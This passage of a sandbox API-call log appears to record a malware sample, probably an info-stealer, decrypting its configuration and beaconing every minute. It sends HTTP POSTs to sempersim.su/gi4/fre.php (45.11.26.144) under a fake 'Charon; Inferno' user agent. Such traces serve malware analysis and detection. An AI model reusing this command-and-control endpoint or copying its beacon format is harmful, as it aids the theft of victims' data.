dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0198.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.711] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0198.725] GetProcessHeap () returned 0x5b0000 [0198.725] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0198.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.726] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0198.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.727] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0198.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.728] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.728] GetProcessHeap () returned 0x5b0000 [0198.729] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0198.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.730] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0198.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.731] CryptDestroyKey (hKey=0x5be048) returned 1 [0198.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.732] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0198.732] GetProcessHeap () returned 0x5b0000 [0198.732] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0198.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0198.733] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0198.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0198.735] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0198.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0198.736] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0198.736] GetProcessHeap () returned 0x5b0000 [0198.736] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0198.737] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cd9f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0198.738] GetProcessHeap () returned 0x5b0000 [0198.738] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa30 [0198.738] socket (af=2, type=1, protocol=6) returned 0x304 [0198.738] connect (s=0x304, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0198.808] FreeAddrInfoW (pAddrInfo=0x5cd9f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0198.808] GetProcessHeap () returned 0x5b0000 [0198.808] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0198.808] GetProcessHeap () returned 0x5b0000 [0198.808] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0198.809] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0198.810] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0198.810] GetProcessHeap () returned 0x5b0000 [0198.810] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0198.810] GetProcessHeap () returned 0x5b0000 [0198.811] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0198.811] GetProcessHeap () returned 0x5b0000 [0198.811] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0198.811] GetProcessHeap () returned 0x5b0000 [0198.811] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0198.812] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0198.813] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0198.813] GetProcessHeap () returned 0x5b0000 [0198.813] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0198.813] GetProcessHeap () returned 0x5b0000 [0198.813] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0198.813] send (s=0x304, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0198.814] send (s=0x304, buf=0x5d1e18*, len=159, flags=0) returned 159 [0198.814] GetProcessHeap () returned 0x5b0000 [0198.814] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0198.814] recv (in: s=0x304, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0200.426] GetProcessHeap () returned 0x5b0000 [0200.426] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0200.426] GetProcessHeap () returned 0x5b0000 [0200.427] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0200.427] GetProcessHeap () returned 0x5b0000 [0200.427] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0200.427] GetProcessHeap () returned 0x5b0000 [0200.427] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0200.428] closesocket (s=0x304) returned 0 [0200.428] GetProcessHeap () returned 0x5b0000 [0200.428] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa30 | out: hHeap=0x5b0000) returned 1 [0200.428] GetProcessHeap () returned 0x5b0000 [0200.428] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0200.429] GetProcessHeap () returned 0x5b0000 [0200.429] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0200.429] GetProcessHeap () returned 0x5b0000 [0200.429] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0200.429] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xafc) returned 0x304 [0200.431] Sleep (dwMilliseconds=0xea60) [0200.437] GetProcessHeap () returned 0x5b0000 [0200.437] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3158 [0200.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.438] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0200.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.445] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0200.470] GetProcessHeap () returned 0x5b0000 [0200.470] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0200.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.472] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0200.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.473] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0200.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.474] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.474] GetProcessHeap () returned 0x5b0000 [0200.474] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0200.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.475] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3158, pdwDataLen=0xdfcfc | out: pbData=0x5d3158, pdwDataLen=0xdfcfc) returned 1 [0200.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.476] CryptDestroyKey (hKey=0x5be048) returned 1 [0200.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.477] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0200.477] GetProcessHeap () returned 0x5b0000 [0200.477] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0200.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0200.478] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0200.479] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0200.480] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0200.481] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.481] GetProcessHeap () returned 0x5b0000 [0200.481] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0200.481] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0200.482] GetProcessHeap () returned 0x5b0000 [0200.482] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0200.482] GetProcessHeap () returned 0x5b0000 [0200.482] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0200.482] GetProcessHeap () returned 0x5b0000 [0200.483] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3158 | out: hHeap=0x5b0000) returned 1 [0200.483] GetProcessHeap () returned 0x5b0000 [0200.483] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0200.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.538] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0200.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.543] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5910) returned 1 [0200.553] GetProcessHeap () returned 0x5b0000 [0200.553] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0200.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.554] CryptImportKey (in: hProv=0x5c5910, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0200.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.555] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0200.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.556] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.556] GetProcessHeap () returned 0x5b0000 [0200.556] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0200.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.557] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0200.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.558] CryptDestroyKey (hKey=0x5bde08) returned 1 [0200.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0200.559] CryptReleaseContext (hProv=0x5c5910, dwFlags=0x0) returned 1 [0200.559] GetProcessHeap () returned 0x5b0000 [0200.559] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0200.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0200.560] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0200.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0200.561] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0200.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0200.565] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0200.565] GetProcessHeap () returned 0x5b0000 [0200.565] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0200.565] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0200.567] GetProcessHeap () returned 0x5b0000 [0200.567] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9d0 [0200.567] socket (af=2, type=1, protocol=6) returned 0x308 [0200.567] connect (s=0x308, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0200.638] FreeAddrInfoW (pAddrInfo=0x5ce0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0200.638] GetProcessHeap () returned 0x5b0000 [0200.638] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0200.638] GetProcessHeap () returned 0x5b0000 [0200.638] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0200.639] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0200.640] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0200.640] GetProcessHeap () returned 0x5b0000 [0200.640] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0200.640] GetProcessHeap () returned 0x5b0000 [0200.640] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0200.640] GetProcessHeap () returned 0x5b0000 [0200.640] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0200.640] GetProcessHeap () returned 0x5b0000 [0200.640] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0200.641] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0200.642] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0200.642] GetProcessHeap () returned 0x5b0000 [0200.642] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0200.642] GetProcessHeap () returned 0x5b0000 [0200.642] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0200.643] send (s=0x308, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0200.643] send (s=0x308, buf=0x5d1e18*, len=159, flags=0) returned 159 [0200.643] GetProcessHeap () returned 0x5b0000 [0200.643] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0200.643] recv (in: s=0x308, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0202.152] GetProcessHeap () returned 0x5b0000 [0202.153] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0202.153] GetProcessHeap () returned 0x5b0000 [0202.154] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0202.154] GetProcessHeap () returned 0x5b0000 [0202.154] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0202.154] GetProcessHeap () returned 0x5b0000 [0202.155] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0202.155] closesocket (s=0x308) returned 0 [0202.156] GetProcessHeap () returned 0x5b0000 [0202.156] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9d0 | out: hHeap=0x5b0000) returned 1 [0202.156] GetProcessHeap () returned 0x5b0000 [0202.156] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0202.156] GetProcessHeap () returned 0x5b0000 [0202.157] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0202.157] GetProcessHeap () returned 0x5b0000 [0202.157] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0202.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1180) returned 0x308 [0202.159] Sleep (dwMilliseconds=0xea60) [0202.171] GetProcessHeap () returned 0x5b0000 [0202.171] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0202.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.172] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0202.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.180] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0202.189] GetProcessHeap () returned 0x5b0000 [0202.189] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0202.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.190] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0202.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.191] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0202.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.192] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.192] GetProcessHeap () returned 0x5b0000 [0202.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0202.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.194] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, pdwDataLen=0xdfcfc | out: pbData=0x5d35d8, pdwDataLen=0xdfcfc) returned 1 [0202.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.195] CryptDestroyKey (hKey=0x5bde08) returned 1 [0202.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.196] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0202.196] GetProcessHeap () returned 0x5b0000 [0202.196] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0202.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0202.197] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0202.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0202.198] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0202.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0202.199] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0202.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0202.200] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0202.200] GetProcessHeap () returned 0x5b0000 [0202.200] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0202.200] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0202.200] GetProcessHeap () returned 0x5b0000 [0202.201] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0202.201] GetProcessHeap () returned 0x5b0000 [0202.201] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0202.201] GetProcessHeap () returned 0x5b0000 [0202.201] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0202.201] GetProcessHeap () returned 0x5b0000 [0202.201] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0202.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.208] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0202.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.214] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0202.223] GetProcessHeap () returned 0x5b0000 [0202.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0202.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.224] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0202.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0202.225] CryptSetKeyParam (hKey=0x5bde08, 